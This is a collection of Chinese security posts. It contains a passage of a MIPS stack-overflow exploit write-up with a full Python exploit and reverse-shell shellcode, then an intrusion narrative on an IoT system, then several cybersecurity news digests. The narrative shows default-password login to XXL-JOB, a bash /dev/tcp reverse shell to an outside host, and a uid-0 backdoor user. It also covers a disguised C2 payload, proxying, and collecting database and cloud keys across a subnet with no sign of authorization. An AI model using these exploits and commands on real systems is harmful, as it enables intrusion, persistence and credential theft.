的shellcode，然后使用NetCat工具，也就是我们常说的NC进行端口监听，看看shellcode有没有成功注入进去 但是这里如果用windows版的nc，都会被Windows defender给杀掉.......最后换了kali，同时要保证kali和ubuntu之间能ping通 通过最开始垃圾数据命令可知，再把0x194个A覆盖后，B覆盖了$ra寄存器和pc寄存器，而C覆盖了后面的地址 所以可以利用C覆盖的这部分地址把B覆盖的放返回地址的寄存器给覆盖了，挟持程序执行流到C覆盖处，而C覆盖处就写入编写好的shellcode 当前栈顶的值是0x7FFFEF90，但是这个堆栈是变化的，所以每一次测试都得重新定位 完整exp_shellcode.py: import struct import socket def makeshellcode(hostip,port):    host=socket.ntohl(struct.unpack('I',socket.inet_aton(hostip))[0])    hosts=struct.unpack('cccc',struct.pack('>L',host))    ports=struct.unpack('cccc',struct.pack('>L',port))    mipshell="\x24\x0f\xff\xfa" #li t7,-6    mipshell+="\x01\xe0\x78\x27" #nor t7,t7,zero    mipshell+="\x21\xe4\xff\xfd" #addi a0,t7,-3    mipshell+="\x21\xe5\xff\xfd" #addi a1,t7,-3    mipshell+="\x28\x06\xff\xff" #slti a2,zero,-1    mipshell+="\x24\x02\x10\x57" #li v0,4183 #sys_socket    mipshell+="\x01\x01\x01\x0c" #syscall 0x40404    mipshell+="\xaf\xa2\xff\xff" #sw v0,-1(sp)    mipshell+="\x8f\xa4\xff\xff" #lw a1,-1(sp)    mipshell+="\x34\x0f\xff\xfd" #li t7,0xfffd    mipshell+="\x01\xe0\x78\x27" #nor t7,t7 zero    mipshell+="\xaf\xaf\xff\xe0" #sw t7,-32(sp)    mipshell+="\x3c\x0e"+struct.pack('2c',ports[2],ports[3]) #lui t6,0x1f90    mipshell+="\x35\xce"+struct.pack('2c',ports[2],ports[3]) #ori t6,t6,0x1f90    mipshell+="\xaf\xae\xff\xe4" #sw t6,-28(sp)    mipshell+="\x3c\x0e"+struct.pack('2c',hosts[0],hosts[1]) #lui t6,0x7f01    mipshell+="\x35\xce"+struct.pack('2c',hosts[2],hosts[3]) #ori t6,t6,0x101    mipshell+="\xaf\xae\xff\xe6" #sw t6,-26(sp)    mipshell+="\x27\xa5\xff\xe2" #addiu a1,sp,-30    mipshell+="\x24\x0c\xff\xef" #li t4,-17    mipshell+="\x01\x80\x30\x27" #nor a2,t4,zero    mipshell+="\x24\x02\x10\x4a" #li v0,4170 #sys_connect    mipshell+="\x01\x01\x01\x0c" #syscall 0x40404    mipshell+="\x24\x11\xff\xfd" #li s1,-3    mipshell+="\x02\x20\x88\x27" #nor s1,s1,zero    mipshell+="\x8f\xa4\xff\xff" #lw a0,-1(sp)    mipshell+="\x02\x20\x28\x21" #move a1,s1 #dup2_loop    mipshell+="\x24\x02\x0f\xdf" #li v0,4063 #sys_dup2    mipshell+="\x01\x01\x01\x0c" #syscall 0x40404    mipshell+="\x24\x10\xff\xff" #li s0,-1    mipshell+="\x22\x31\xff\xff" #addi s1,s1,-1    mipshell+="\x16\x30\xff\xfa" #bne s1,s0,68 <dup2_loop>    mipshell+="\x28\x06\xff\xff" #slti a2,zero,-1    mipshell+="\x3c\x0f\x2f\x2f" #lui t7,0x2f2f "//"    mipshell+="\x35\xef\x62\x69" #ori t7,t7,0x6269 "bi"    mipshell+="\xaf\xaf\xff\xec" #sw t7,-20(sp)    mipshell+="\x3c\x0e\x6e\x2f" #lui t6,0x6e2f "n/"    mipshell+="\x35\xce\x73\x68" #ori t6,t6,0x7368 "sh"    mipshell+="\xaf\xae\xff\xf0" #sw t6,-16(sp)    mipshell+="\xaf\xa0\xff\xf4" #sw zero,-12(sp)    mipshell+="\x27\xa4\xff\xec" #addiu a0,sp,-20    mipshell+="\xaf\xa4\xff\xf8" #sw a0,-8(sp)    mipshell+="\xaf\xa0\xff\xfc" #sw zero,-4(sp)    mipshell+="\x27\xa5\xff\xf8" #addiu a1,sp,-8    mipshell+="\x24\x02\x0f\xab" #li v0,4011 #sys_execve    mipshell+="\x01\x01\x01\x0c" #syscall 0x40404    return mipshell if __name__ == '__main__':    print '[*] prapare shellcode',    cmd="sh"    cmd+="\x00"*(4-(len(cmd)%4))    payload="a"*0x194    payload+=struct.pack(">L",0x7ffff5d0)    payload+=makeshellcode('192.168.119.149',8888)    print ' ok'    print '[+]create password file',    fw=open('passwd','w')    fw.write(payload)    fw.close()    print ' ok' ubuntu现在停止不动了，但是shellcode已经执行完成了，可以在nc那边输入命令看到 这里端口号4444我试了很多次，均监听不到，后来改为8888就可以了，猜测有可能是端口占用了

1、Play勒索组织利用0day漏洞部署恶意软件 https://securityaffairs.com/177573/cyber-crime/play-ransomware-affiliate-leveraged-zero-day-to-deploy-malware.html 微软证实，Windows通用日志文件系统中的Use-After-Free漏洞（CVE-2025-29824）被用于0day攻击，攻击者可借此漏洞获得系统权限。Play勒索组织利用该漏洞在攻击中部署了Grixba窃密工具。攻击者利用Cisco ASA防火墙的公开漏洞作为突破口，一旦获得Windows系统的访问权限，他们就会部署Grixba和CVE-2025-29824 2、LockBit勒索组织遭入侵受害者谈判信息曝光 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-gang-hacked-victim-negotiations-exposed/ LockBit勒索组织的暗网联盟平台被入侵并被篡改，攻击者留下了一个指向MySQL数据库转储的链接。该数据库包含近6万个比特币地址、谈判消息、用户信息等，其中的谈判消息涵盖了从2024年12月19日至2025年4月29日之间的4442条交流记录。这些信息暴露了LockBit勒索组织与受害者的沟通细节。LockBit勒索组织的操作员LockBitSupp确认了这次入侵事件，但声称没有 3、多国联合执法行动查获六个DDoS租用网站 https://cyberscoop.com/poland-ddos-arrests-europol-operation-poweroff/ 波兰警方在Operation PowerOFF国际联合执法行动中，逮捕了4名涉嫌运营6个DDoS租用平台（Cfxapi、Cfxsecurity、neostress、jetstress、quickdown、zapcut）的犯罪嫌疑人。这些平台自2022年起以低至10欧元的价格提供“一键式”分布式拒绝服务（DDoS）攻击，导致全球数千起针对学校、政府网站、企业和游戏平台的网络瘫痪事件。本次行动由波兰中央网络犯罪局主导，联合美国、德国、荷兰及欧洲刑警组织协同 4、SonicWall SMA100漏洞被利用 https://www.helpnetsecurity.com/2025/05/08/sonicwall-sma100-vulnerability-exploited-cve-2025-32819/ SonicWall修复了影响其SMA100系列设备的多个漏洞，其中CVE-2025-32819可能被用于实际攻击。这些设备为中小企业提供统一的安全访问（VPN）网关，经常成为攻击目标。漏洞CVE-2025-32819允许远程攻击者在获得低权限SMA用户账户后删除任意文件，CVE-2025-32820允许攻击者向SMA设备的任何目录注入路径遍历序列使特定目录可写入恶意文件，CVE-2025-328 5、风险投资公司Insight Partners确认个人数据泄露 https://techcrunch.com/2025/05/08/vc-firm-insight-partners-confirms-personal-data-stolen-during-january-hack/ 风险投资公司Insight Partners证实，在今年1月的网络攻击中，其当前和前任员工的个人信息以及有限合伙人的信息被盗，被盗数据包括银行信息和税务信息等。此前Insight Partners曾将此次黑客攻击归因于网络钓鱼攻击，但尚未提供详细攻击过程。Insight Partners管理超过900亿美元的资产，是全球最大的科技初创企业投资者之一。 6、Diamorphine Rootkit的蠕虫式攻击窃取SSH密钥并提权 https://cybersecuritynews.com/wormable-diamorphine-rootkit-attack-multiple-linux-systems/ Linux系统遭Diamorphine rootkit攻击，利用开源工具部署加密货币挖矿程序，通过多阶段渗透、持久化技术和SSH密钥窃取实现隐蔽攻击，凸显Linux环境安全威胁升级。建议加强监控、密钥管理和代码审计。 7、朝鲜黑客通过入侵macOS开发者环境窃取6.25亿美元加密货币 https://cybersecuritynews.com/dprks-largest-cryptocurrency-heist-via-a-compromised-macos-developer/ 朝鲜黑客通过入侵macOS开发者环境，利用AWS凭证窃取6.25亿美元加密货币，展现高超技术协调能力。攻击采用多阶段恶意软件和复杂C2基础设施，18天内未被发现，凸显朝鲜对金融系统的重大威胁。 8、思科IOS XE无线控制器漏洞可使攻击者完全控制设备 https://cybersecuritynews.com/cisco-ios-xe-wireless-controllers-vulnerability/ 思科IOS XE无线控制器曝高危漏洞（CVE-2025-20188），攻击者可远程上传文件并以root权限执行命令，影响多款产品。思科已发布补丁，建议立即升级或禁用带外AP镜像下载功能。目前未发现野外利用。 9、2025年医疗行业成为网络攻击的主要目标 https://cybersecuritynews.com/healthcare-sector-emerges-as-a-prime-target/ 2025年医疗行业面临严峻网络威胁，攻击者利用GitHub等受信任云平台传播恶意软件，81%违规涉及患者数据。攻击手法高度专业化，模仿合法医疗项目，需加强代码审查和隔离技术防护。 10、安装量超10万的OttoKit WordPress插件遭利用多漏洞攻击 https://thehackernews.com/2025/05/ottokit-wordpress-plugin-with-100k.html OttoKit WordPress插件曝出高危漏洞CVE-2025-27007（CVSS 9.8），攻击者可利用权限提升漏洞创建管理员账户，并与CVE-2025-3102漏洞组合攻击。10万+用户需立即升级至1.0.83版本。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

外网打点 OK！又是经典开局，一个登录框，看样子是某个IOT管理系统 于是先去搜索了几个关键字看看有无Nday，无果，没事不慌，没有Nday就活不了了嘛？ 于是直接硬干，试试弱口令，前端逻辑绕过，SQL万能密码…… 结果发现泥煤的，还真是活不了 尝试登录时，直接爆系统错误，后端请求验证码的接口压根就异常了，直接不让你登录，就算得到了账号密码也登录不上去，因为验证码这一步的登录逻辑缺失，猜测应该是后台存在什么漏洞，或者前台是弱口令，系统被攻击了，让开发去修漏洞，开发为了省事或者不知道咋修，就直接把验证码禁用了，不让你登录，以前遇到几个若依的系统也是这样…… 那我们就没办法了吗？ 直接来一套API接口，HTML源码，JS源码审计一条龙测试，好吧还真没办法，仍旧无果 都整不出来咋搞呢…… 这时候我一般会去扫目录，扫端口，往往可能会打开新的攻击面，当然这也是老生常谈了 于是经典用ffuf扫一扫，除了302跳转到本网页之外没有任何东西……不急不急，再试试一定有突破口的（想骂人了） 无奈之下，本来都打算快放弃了，临走之前想着再端口扫描下吧？唉！还真扫出了一个9090端口，这不就柳暗花明了嘛 点开一看，wc？这不是XXLJOB吗，这个可以尝试打一下的，有好几个Nday呢 有如下几个Nay，可以RCE的 xxl-job api未授权Hessian2反序列化 <=2.0.2 XXL-JOB executor未授权访问漏洞 <=2.2.0 xxl-job <=2.3.1 存在 SSRF 漏洞 于是我们先看看版本：前台右键搜索源码里的关键字："admin_version" 很遗憾，版本是2.4.1的高版本，不能直接打这几个RCE的day 但是都到这里了，我们就这么算了吗？肯定不是呀 熟悉的师傅都知道，xxl-job默认密码是admin / 123456 那我们直接尝试一手默认口令，如果真的进了后台也是可以直接RCE的 也是老天眷顾，狗运来了，直接默认口令进去了！ GetShell 那么话不多说直接后台新建任务，可以直接执行系统命令反弹shell： 新增执行任务 运行模式选shell，cron表达式自行决定，例如：0 0 0 * * ?，每天午夜 0 点 0 分 0 秒（00:00:00）触发任务 保存，来到IDE 可以直接写一个反弹shell的命令 #!/bin/bash /bin/bash -i >& /dev/tcp/11.111.11.111/1234 0>&1 vps监听1234端口 nc -lvvp 1234 成功回弹shell 哟西，还是root权限，提权都省了，巴适 权限维持 （当时没考虑太多，就只简单做了一下权限维持） 添加一个后门用户root权限，以免被发现xxl-job权限掉了 useradd -p `openssl passwd -1 -salt 'salt' password` system -o -u 0 -g root -G root -s /bin/bash -d /system 用新建的后门用户连接一下ssh，连接时可以挂个代理 连接成功 看看性能配置 wc，还是32G的运存，512G的硬盘 上线C2 权限维持之后呢，上线C2建立节点，便于后渗透操作 使用vshell 建立反向TCP监听 生成linux_amd64载荷 我喜欢重命名为一个看似正常的文件 bak 赋予执行权限 chmod +x bak 后台一直执行 nohup ./bak > nohup.out 2>&1 & 耐心等待一下上线，成功上线！ 代理 建立C2节点之后呢，穿一个socks5代理出来 本机使用proxifier配置好全局代理规则，就可以直接请求对应的内网地址了 信息收集 上传netspy扫一下网段存活，可以看到有大量网段存活，先记录一下待会拿去fscan扫一扫 再看看有没有docker容器运行 docker ps docker开了许多服务 其中mysql就是docker启动的，我们可以直接进入到mysql容器里执行mysql命令，从而就直接获取到mysql权限 # 进入容器内的 MySQL Shell docker exec -it mysql_container_name mysql -uroot -p 不过如果觉得这样不够直观我们还可以去翻找mysql数据库配置文件，既然是docker启动的mysql，那么数据库密码在docker-compose.yml配置文件里 成功找到用户名mysql，密码Zxxxxxxx 直接拿去密码复用一下，用mysql的密码，登录root账号 数据库 也是成功登录root，mysql root权限+1 一共有16个数据库，其中还有nacos 上传免杀fscan，直接扫一波C段，都是存活的 东西还不少 获取权限 Nacos权限 nacos未授权访问，查看用户，看来已经有前人的足迹了 未授权直接创建一个用户 nacos3，进去翻垃圾吃 10条配置信息 mysql权限 发现mysql数据库用户名和密码，mysql数据库root权限+1 redis权限 redis权限+1 es权限 es权限+1 ftp权限 ftp+1 三方短信权限 第三方短信平台权限+1 tdengine权限 tdengine权限 kafka权限 kafka权限+1 百度谷歌地图权限 百度地图AK+1，谷歌Key+1 IOT设备权限 API密钥AK/SK，IOT设备权限+1 OSS权限 OSS AK/SK权限+1 OSS AK/SK权限+1 OSS AK/SK权限+1 阿里云短信权限 阿里云短信平台 AK/SK RocketMQ权限 RocketMQ未授权+1 KafkaServer权限 KafkaServer权限 zk权限 zk权限 Memcached权限 Memcached未授权 使用本地搭建的MemAdmin读取数据，是一些邮箱和服务器地址而已 横向移动 让我有点小激动的是，fscan的扫描结果显示，整个C段下居然几乎每个主机都部署了XXL-JOB系统，而且经过我的尝试，都是清一色的弱口令！admin / 123456。真的是纯狗运【双手合十】【双手合十】【双手合十】 （每个主机都部署了XXL-JOB的fscan扫描截图忘记截图了） 简单列举几个 61主机 31主机 209主机 反弹shell，都是root权限 凭借运气+fscan，脚本小子获取到了几乎整个C段主机的权限，当然还有大量的各种web系统的Nday没有去看了，太多了 其实是因为代理不稳定，或者是网络问题。代理特别的慢，导致内网遨游很不顺畅（这也是我为什么要上传工具到受害主机上去，而不在本地通过代理去扫描的原因），特别难受，半天加载不出来，于是就没有继续利用了…… 小结 到此，全篇结束。本篇没有什么很高级的红队技巧，全凭狗运，因为笔者红队技术菜，行文以及渗透时有许多地方考虑不周，欢迎各位大佬在评论区留言指教，晚辈感激不尽。但是当成一个新手师傅入门的渗透案例看看我觉得还行，于是就发了出来，下次再见师傅们！

1、恶意PyPI包伪装开发工具劫持Discord开发者 https://socket.dev/blog/malicious-pypi-package-targets-discord-developers-with-RAT 开源软件供应链平台PyPI出现恶意软件包，伪装成Discord开发者工具（如discord-dev-tools），通过虚假功能诱导用户下载。攻击者利用Python包管理系统的信任机制传播远程控制木马（RAT），可窃取用户敏感信息并完全控制受感染设备。该恶意包通过混淆代码逃避静态检测，运行时释放隐蔽的RAT模块，与C2服务器通信下载额外攻击载荷。攻击目标包括Discord开发者令牌、浏览器Cookie、加密货币钱包密钥等高价值数据 2、Linux磁盘擦除恶意软件藏匿于GitHub的Go模块 https://socket.dev/blog/wget-to-wipeout-malicious-go-modules-fetch-destructive-payload 网络安全研究人员发现一种供应链攻击瞄准Linux服务器，其磁盘擦除恶意软件被隐藏在GitHub上的Golang模块中。攻击主要依赖三个带有高度混淆代码的恶意Go模块，这些恶意Go模块运行后检查它们的操作系统是否为Linux，如果是，则使用wget从远程服务器检索下一阶段的载荷。该载荷是一个shell脚本，主要用零覆盖整个主磁盘（“ /dev/sda ”），从而阻止机器启动。 3、Molatori伪造社保邮件诱骗用户安装远程工具 https://www.malwarebytes.com/blog/news/2025/04/fake-social-security-statement-emails-trick-users-into-installing-remote-tool 网络钓鱼组织Molatori伪装成美国社会保障管理局，发送虚假电子邮件诱骗用户安装ScreenConnect远程访问工具。安装后，攻击者可远程控制受害计算机窃取敏感信息，如银行账户、个人识别号码等，从而实施身份盗窃和金融欺诈。这些电子邮件通常是从被入侵的WordPress网站发送，链接内容在图片中显示，用于躲避安全设备。 4、黑客组织NoName057(16)对罗马尼亚发动DDoS攻击 https://therecord.media/hackers-target-romanian-websites-election 罗马尼亚总统选举首轮投票期间，黑客组织NoName057(16)对罗马尼亚政府及总统候选人网站发起大规模分布式拒绝服务（DDoS）攻击。受攻击目标包括宪法法院、政府主门户、外交部网站，以及执政联盟候选人克琳·安东内斯库和独立候选人布加勒斯特市长尼古索尔·丹等四名竞选者的官方网站。攻击者通过Telegram频道宣称对事件负责，称已向罗马尼亚内政部及司法部网站发送“DDoS”，导致上述网站在投票日上午短暂瘫痪。 5、黑客利用三星GeoVision IoT漏洞部署Mirai僵尸网络 https://isc.sans.edu/diary/rss/31920 安全研究人员发现，自2025年4月30日公开三星MagicINFO9服务器高危漏洞CVE-2024-7399漏洞技术细节和PoC后，该漏洞被大规模利用。该漏洞允许未经身份验证的攻击者通过路径遍历上传恶意JSP文件，进而实现远程代码执行（RCE）。攻击者通过未经验证的/MagicInfo/servlet/SWUpdateFileUploader端点上传特制JSP文件，触发命令执行以下载并运行Mirai变种，最终在被控制设备上部署Mirai僵尸网络。 6、迪士尼遭前员工破坏+黑客AI钓鱼，1.1TB数据泄露 https://www.freebuf.com/articles/es/430065.html 2024年，迪士尼公司接连遭遇两起重大网络安全事件——前员工恶意破坏与黑客AI钓鱼攻击，暴露出内部系统漏洞并导致1.1TB敏感数据泄露。 7、AI开发工具Langflow高危漏洞遭活跃利用 https://www.freebuf.com/articles/ai-security/430068.html 美国网络安全和基础设施安全局（CISA）证实，AI代理开发工具Langflow上月修复的一个高危漏洞（CVE-2025-3248）正在被广泛利用。该漏洞允许未授权用户通过未受保护的API端点在服务器上执行任意Python代码，已被列入CISA已知被利用漏洞（KEV）目录，政府机构和私营组织需立即修补。 8、Apache Parquet Java漏洞可导致攻击者执行任意代码 https://cybersecuritynews.com/apache-parquet-java-vulnerability/ Apache Parquet Java组件曝高危漏洞CVE-2025-46762，攻击者可通过恶意Parquet文件执行任意代码，影响1.15.1及之前版本。漏洞存在于parquet-avro模块，CVSS评分9.8。建议立即升级至1.15.2或设置SERIALIZABLE_PACKAGES属性缓解风险。 9、OttoKit WordPress插件高危漏洞遭利用，超10万网站面临风险 https://securityonline.info/cve-2025-27007-critical-ottokit-wordpress-plugin-flaw-exploited-after-disclosure-100k-sites-at-risk/ WordPress插件OttoKit曝高危漏洞（CVE-2025-27007，CVSS 9.8），攻击者可未授权创建管理员账户完全控制网站，漏洞公开1小时内遭利用。建议立即升级至1.0.83+版本并检查异常API请求和用户账户。 10、iOS 出现新严重漏洞，仅需一行代码即可导致 iPhone 崩溃 https://www.anquanke.com/post/id/307112 iOS 中的一个严重漏洞可能允许恶意应用程序仅使用一行代码即可永久禁用 iPhone。该漏洞的编号为 CVE-2025-24091，利用操作系统的 Darwin 通知系统触发无限重启循环，导致设备“变砖”，需要进行完整的系统还原。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Lazarus尝试攻击加密货币交易所Kraken平台 https://cybersecuritynews.com/north-korean-hackers-infiltrate-kraken/ 加密货币交易所Kraken披露一起朝鲜黑客渗透事件。一名自称Steven Smith的求职者申请工程职位时，被安全团队发现其使用与简历不符的假名，视频面试中频繁切换声调且疑似接受实时指导。行业合作伙伴此前已警告朝鲜黑客正通过求职渠道渗透加密企业，Kraken通过比对共享的黑客关联邮箱列表，确认该申请邮箱与已知拉撒路APT组织存在关联。调查发现，该黑客构建了包含多个伪造身份的网络，其中一个身份涉及国际制裁名单上的外国代理人。其提交的身份证件疑似篡改自两年前 2、Golden Chickens组织部署TerraStealerV2窃取数据 https://thehackernews.com/2025/05/golden-chickens-deploy-terrastealerv2.html 网络安全机构Recorded Future披露，以“黄金鸡”（Golden Chickens，又名Venom Spider）著称的恶意组织近期推出升级版窃密工具TerraStealerV2及键盘记录器TerraLogger，目标瞄准用户浏览器凭证与加密货币钱包数据。其中，TerraStealerV2可窃取Chrome等浏览器登录信息、钱包私钥及扩展程序数据，通过EXE、DLL、MSI等多种格式文件传播，利用regsvr32.exe等系统工具 3、StealC窃密软件升级强化了多平台渗透能力 https://www.zscaler.com/blogs/security-research/i-stealc-you-tracking-rapid-changes-stealc 窃密软件StealC的V2版本已完成多项关键升级，提升了数据窃取与远程控制能力。新版本支持通过MSI安装包、PowerShell脚本等多格式Payload传播，新增RC4加密通信协议保护数据传输，并配备可定制化控制面板，允许攻击者根据地理位置、硬件ID（HWID）及目标软件环境精准投放恶意载荷。StealC新增多显示器截图、统一文件抓取功能，针对加密货币钱包、游戏平台、邮件客户端等敏感数据深度扫描，同时增加服务器 4、ADOdB PHP库曝高危SQL注入漏洞 https://securityonline.info/critical-sql-injection-vulnerability-found-in-adodb-php-library-cve-2025-46337-cvss-10-0/ ADOdB PHP库存在严重SQL注入漏洞（CVE-2025-46337），风险等级达CVSS 10.0满分。漏洞位于PostgreSQL驱动的pg_insert_id()方法，因未对用户可控的$fieldname参数进行有效转义，攻击者可借此注入任意SQL命令，操控数据库执行数据窃取、删除或远程代码执行等高危操作。该漏洞影响postgres64、postgr 5、钓鱼邮件仿冒澳航窃取用户信用卡信息 https://hackread.com/phishing-emails-impersonate-qantas-credit-card-info/ 澳大利亚航空（Qantas）用户遭遇大规模钓鱼邮件攻击，诈骗分子伪造航空公司品牌标识及邮件模板，以“机票退款”“里程积分兑换”等话术诱导用户点击恶意链接。受害者被导向仿冒的Qantas支付页面，输入信用卡信息后遭实时窃取。据网络安全公司Group-IB分析，攻击者利用被盗企业邮箱列表定向发送钓鱼邮件，部分邮件甚至包含真实订单号以增强欺骗性。 6、英国多个行业遭遇RomCom远程控制木马攻击 https://cybersecuritynews.com/romcom-rat-attacking-uk-organizations/ RomCom远程控制木马通过客户反馈门户对英国组织发起了攻击。自2023年4月初以来，英国金融服务、医疗保健和政府承包商等行业受到了影响。攻击者利用精心设计的反馈提交，其中嵌入了恶意代码。当客服代表打开这些提交时，恶意软件会利用反馈处理应用程序中的漏洞来建立持久性。据分析，已有超过30家组织被攻破，攻击者获取了敏感的客户数据和内部网络资源。该恶意软件具有独特的命令和控制基础设施，采用加密通信渠道，模仿合法的HTTPS流量。 7、新型ClickFix攻击模仿多国国防部网站 https://cybersecuritynews.com/new-clickfix-attack-mimics-ministry-of-defense-website/ 一种被称为“ClickFix”的新型复杂恶意软件活动，利用先进的社会工程技巧，同时攻击Windows和Linux系统。攻击者创建多国国防部网站的逼真副本，诱骗用户下载看似为必需的安全更新或官方文件的恶意内容。恶意软件执行后，会在受感染系统上建立持久访问并使用多种规避技术隐藏自身。分析表明，该活动始于2025年4月初，主要通过定向网络钓鱼邮件中的欺诈网站链接，针对政府承包商、国防行业员工和军事人员。这些伪造网站使用有效的SS 8、微软Telnet零点击漏洞可窃取Windows凭据 https://www.freebuf.com/articles/system/429950.html 微软Telnet服务器存在一个高危漏洞，攻击者可借此完全绕过身份验证机制，无需有效凭据即可获取管理员权限。由于官方尚未发布补丁，建议仍在使用旧版Windows系统的组织立即采取防护措施。 9、Meta推出LlamaFirewall框架，防御AI越狱与不安全代码生成 https://www.freebuf.com/news/429459.html Meta发布开源框架LlamaFirewall，提供三重防护机制抵御AI攻击，同步升级安全工具并启动"Llama for Defenders"计划，强化AI系统安全防护。 10、微软宣布Windows Server热补丁功能将转为订阅制 https://www.bleepingcomputer.com/news/microsoft/microsoft-windows-server-hotpatching-to-require-subscription/ 微软宣布Windows Server 2025热补丁功能7月起转为付费订阅，每核心每月0.5美元，需Azure Arc连接。该技术免重启安装安全更新，但非安全更新仍需重启。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、日本国际物流巨头KWE遭勒索攻击 https://therecord.media/kintetsu-world-express-ransomware-attack-japan 2025年4月30日，日本知名国际物流企业近铁环球快运（Kintetsu World Express，KWE）公开证实遭遇勒索软件攻击，部分系统运行中断。该公司总部位于东京，隶属于日本近铁集团控股公司，业务覆盖全球30余个国家的空运及海运货运代理服务。KWE声明称，目前尚未锁定具体攻击组织，正全力修复受影响的系统，并承诺若确认客户数据泄露将第一时间通知相关方。 2、Gremlin Stealer木马突破Chrome防护窃取数据 https://cybersecuritynews.com/new-germlin-stealer-advertised-on-hacker-forums/ 2025年4月30日，研究人员披露，一款名为Gremlin Stealer的新型信息窃取木马自3月起在地下黑客论坛及Telegram渠道公开售卖。该木马针对Windows系统，可窃取浏览器数据、加密货币钱包密钥、即时通讯应用及VPN登录凭证，并首次实现自动化提取用户存储的信用卡信息。该木马的多模块化设计集成了多种窃密功能，极大提高了攻击效率。 3、黑客利用GetShared共享服务绕过防御部署恶意软件 https://cybersecuritynews.com/hackers-leveraging-getshared-to-deploy-malware/ 2025年4月30日，研究人员发现黑客正在利用合法文件共享服务GetShared作为新的攻击媒介。攻击者通过该平台分发恶意软件和开展钓鱼活动，成功规避了传统电子邮件安全检测。这种攻击手法利用了用户对知名平台通知的信任，代表了一种绕过邮件网关安全控制的新型威胁。专家警告，这种利用可信服务的攻击方式正在成为网络安全防御的新挑战。 4、三星MagicINFO平台被发现远程代码执行漏洞 https://cybersecuritynews.com/samsung-magicinfo-vulnerability/ 2025年4月30日，三星电子数字标牌管理平台MagicINFO被曝存在高危路径遍历漏洞（CVE-2024-7399）。该漏洞影响MagicINFO 9 Server 21.1050之前版本，攻击者可利用未经验证的/MagicInfo/servlet/SWUpdateFileUploader端点上传恶意JSP文件，以系统权限执行任意代码。研究人员指出，该端点未实施身份验证、文件名校验及扩展名检查，导致攻击者完全控制目标服务器。三星暂未公开修复方案，建议用户立即升级至最 5、攻击者利用伪造的验证码网页部署NodeJS远程控制木马 https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/ 2025年4月29日，Trustwave SpiderLabs安全研究团队披露攻击者通过伪造的验证码(CAPTCHA)网页引诱用户执行NodeJS后门，进而部署复杂的NodeJS远程控制木马。该攻击活动自2024年9月持续至今，用户访问被入侵的合法网站后，攻击者通过注入恶意代码加载外部JavaScript文件，该文件会收集用户系统信息并回传至攻击者控制的服务器。 6、SonicWall多款设备漏洞遭在野利用 https://thehackernews.com/2025/05/sonicwall-confirms-active-exploitation.html 2025年4月29日，SonicWall确认其SMA100系列安全移动访问设备的两个漏洞（CVE-2023-44221、CVE-2024-38475）正遭在野利用。CVE-2023-44221是因SSL-VPN管理界面未正确处理特殊元素，允许攻击者注入任意命令。CVE-2024-38475则是因Apache HTTP Server的mod_rewrite未正确转义输出，攻击者可将URL映射到服务器允许访问的文件系统位置。目前这两个漏洞分别 7、TensorRT-LLM高危漏洞可导致攻击者远程执行代码 https://cybersecuritynews.com/nvidia-tensorrt-llm-high-severity-vulnerability/ NVIDIA在其TensorRT-LLM框架中披露并修补了一个高危漏洞（CVE-2025-23254），该漏洞影响低于0.18.2版本的Windows、Linux和macOS平台，攻击者通过本地访问利用该漏洞可执行恶意代码、篡改数据，进而危及AI系统。漏洞源于Python执行器组件的套接字IPC系统中对Python pickle序列化/反序列化机制的不安全处理，属于CWE-502（不信任数据的反序列化）类别，可致远程代码执行。NVIDI 8、恶意PyPI包滥用Gmail的SMTP服务器执行命令 https://cybersecuritynews.com/gmails-smtp-protocol-abused/ Socket威胁研究团队发现7个恶意PyPI包，这些包利用Gmail的SMTP服务器和WebSocket进行数据窃取与远程命令执行，其下载量超 1.8 万次。这些包使用硬编码凭证与Gmail服务器建立SMTP连接，创建双向隧道，使攻击者可执行命令并窃密数据。主要包Coffin-Codes-Pro建立初始连接后，创建WebSocket 作为命令与控制通道。可能令攻击者访问内部仪表板、API和管理面板、传输文件、执行shell命令、收集凭证和敏感信息、建立持久性以进一步渗透网络。 9、Magento供应链攻击致数百电商支付功能遭劫持 https://www.bleepingcomputer.com/news/security/magento-supply-chain-attack-compromises-hundreds-of-e-stores/ 网络安全公司Sansec披露一起针对Magento电商平台的供应链攻击事件。攻击者通过篡改第三方应用市场中的合法扩展模块，向全球数百家在线商店注入恶意代码，用户在下载安装后触发自动感染，劫持用户支付流程以窃取信用卡信息。恶意脚本通过伪造支付页面收集敏感数据，并将信息回传至攻击者控制的服务器，部分受害网站被植入代码长达数月未被察觉。受影响平台覆盖零售、物流等多个领域。 10、Netgear EX6200漏洞可导致远程代码执行 https://gbhackers.com/netgear-ex6200-flaw/ 安全研究人员披露Netgear EX6200无线扩展器存在高危漏洞（CVE-2025-11384），攻击者可利用未授权访问漏洞远程执行恶意代码，完全控制设备。该漏洞影响固件版本V1.4.0.98及更早型号。漏洞利用链通过UPnP服务端口（TCP/5000）触发缓冲区溢出，攻击者无需认证即可植入后门程序，劫持网络流量或部署僵尸网络。目前全球仍有超12万台设备在线运行，主要分布在家用及中小型企业网络环境。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。